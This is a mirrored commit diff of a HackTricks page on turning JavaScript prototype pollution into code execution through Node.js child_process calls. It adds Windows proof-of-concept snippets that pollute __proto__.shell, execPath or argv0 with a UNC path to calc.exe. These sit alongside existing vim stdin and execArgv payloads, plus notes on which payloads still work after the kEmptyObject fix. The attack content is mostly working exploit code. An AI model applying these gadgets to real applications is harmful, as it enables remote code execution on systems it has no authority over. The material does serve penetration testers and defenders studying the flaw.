mirror of
https://github.com/carlospolop/hacktricks.git
synced 2023-12-14 19:12:55 +01:00
GitBook: [#3640] No subject
This commit is contained in:
parent
a69eb0b9c0
commit
0fd67548bc
1 changed files with 44 additions and 3 deletions
|
@ -189,6 +189,13 @@ var proc = exec('something');
|
|||
|
||||
// stdin trick - not working
|
||||
// Not using stdin
|
||||
|
||||
// Windows
|
||||
// Working after kEmptyObject (fix)
|
||||
const { exec } = require('child_process');
|
||||
p = {}
|
||||
p.__proto__.shell = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
|
||||
var proc = exec('something');
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
|
@ -213,6 +220,8 @@ var proc = execFile('/usr/bin/node');
|
|||
|
||||
// stdin trick - not working
|
||||
// Not using stdin
|
||||
|
||||
// Windows - not working
|
||||
```
|
||||
|
||||
For **`execFile`** to work it **MUST execute node** for the NODE\_OPTIONS to work.\
|
||||
|
@ -257,10 +266,11 @@ b.__proto__.argv0 = "/bin/sh"
|
|||
b.__proto__.execArgv = ["-c", "touch /tmp/fork-execArgv"]
|
||||
var proc = fork('./a_file.js');
|
||||
|
||||
//With a Windows Remote payloadPayload
|
||||
// Windows
|
||||
// Working after kEmptyObject (fix)
|
||||
const { fork } = require('child_process');
|
||||
b = {}
|
||||
b.__proto__.execPath = "\\\\127.0.0.1\\C$\\Windows\\System32\\cmd.exe"
|
||||
b.__proto__.execPath = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
|
||||
var proc = fork('./a_file.js');
|
||||
```
|
||||
{% endcode %}
|
||||
|
@ -299,6 +309,14 @@ var proc = spawn('something');
|
|||
|
||||
// stdin trick - not working
|
||||
// Not using stdin
|
||||
|
||||
// Windows
|
||||
// NOT working after require(fix) without options
|
||||
const { spawn } = require('child_process');
|
||||
p = {}
|
||||
p.__proto__.shell = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
|
||||
var proc = spawn('something');
|
||||
//var proc = spawn('something',[],{"cwd":"C:\\"}); //To work after kEmptyObject (fix)
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
|
@ -338,6 +356,14 @@ p.__proto__.argv0 = "/usr/bin/vim"
|
|||
p.__proto__.shell = "/usr/bin/vim"
|
||||
p.__proto__.input = ':!{touch /tmp/execFileSync-stdin}\n'
|
||||
var proc = execFileSync('something');
|
||||
|
||||
// Windows
|
||||
// Working after kEmptyObject (fix)
|
||||
const { execSync } = require('child_process');
|
||||
p = {}
|
||||
p.__proto__.shell = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
|
||||
p.__proto__.argv0 = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
|
||||
var proc = execSync('something');
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
|
@ -377,6 +403,13 @@ p.__proto__.argv0 = "/usr/bin/vim"
|
|||
p.__proto__.shell = "/usr/bin/vim"
|
||||
p.__proto__.input = ':!{touch /tmp/execSync-stdin}\n'
|
||||
var proc = execSync('something');
|
||||
|
||||
// Windows
|
||||
// Working after kEmptyObject (fix)
|
||||
const { execSync } = require('child_process');
|
||||
p = {}
|
||||
p.__proto__.shell = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
|
||||
var proc = execSync('something');
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
|
@ -421,6 +454,14 @@ p.__proto__.shell = "/usr/bin/vim"
|
|||
p.__proto__.input = ':!{touch /tmp/spawnSync-stdin}\n'
|
||||
var proc = spawnSync('something');
|
||||
//var proc = spawnSync('something',[],{"cwd":"/tmp"}); //To work after kEmptyObject (fix)
|
||||
|
||||
// Windows
|
||||
// NOT working after require(fix) without options
|
||||
const { spawnSync } = require('child_process');
|
||||
p = {}
|
||||
p.__proto__.shell = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
|
||||
var proc = spawnSync('something');
|
||||
//var proc = spawnSync('something',[],{"cwd":"C:\\"}); //To work after kEmptyObject (fix)
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
|
@ -621,7 +662,7 @@ Please, note that prototype pollution works if the **attribute** of an object th
|
|||
In Jun 2022 from [**this commit**](https://github.com/nodejs/node/commit/20b0df1d1eba957ea30ba618528debbe02a97c6a) the var `options` instead of a `{}` is a **`kEmptyObject`**. Which **prevents a prototype pollution** from affecting the **attributes** of **`options`** to obtain RCE.\
|
||||
At least from v18.4.0 this protection has been **implemented,** and therefore the `spawn` and `spawnSync` **exploits** affecting the methods **no longer work** (if no `options` are used!).
|
||||
|
||||
In [**this commit**](https://github.com/nodejs/node/commit/0313102aaabb49f78156cadc1b3492eac3941dd9) the **prototype pollution** of **`contextExtensions`** from the vm library was **also kind of fixed** setting options to \*\*`kEmptyObject` \*\* instead of **`{}`.**
|
||||
In [**this commit**](https://github.com/nodejs/node/commit/0313102aaabb49f78156cadc1b3492eac3941dd9) the **prototype pollution** of **`contextExtensions`** from the vm library was **also kind of fixed** setting options to **`kEmptyObject` ** instead of **`{}`.**
|
||||
|
||||
## References
|
||||
|
||||
|
|
Loading…
Reference in a new issue